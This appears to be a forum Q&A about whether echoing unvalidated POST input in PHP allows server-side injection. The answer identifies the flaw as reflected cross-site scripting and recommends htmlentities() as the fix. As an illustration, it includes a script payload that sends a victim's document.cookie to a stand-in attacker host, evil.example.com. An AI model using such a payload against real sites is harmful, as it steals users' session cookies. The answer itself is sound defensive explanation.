I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via POST and is saved in a variable called Temp.
If I create the output script with the below line, will the echo prevents File inclusion or arbitrary PHP injection, assuming that no validations are being done?
<?php echo $Temp; ?>
分享 This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.
A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like
<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>
When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as HttpOnly). To mitigate this do the following:
<?php echo htmlentities($Temp); ?>
which will display any script as HTML rather than execute it.
分享
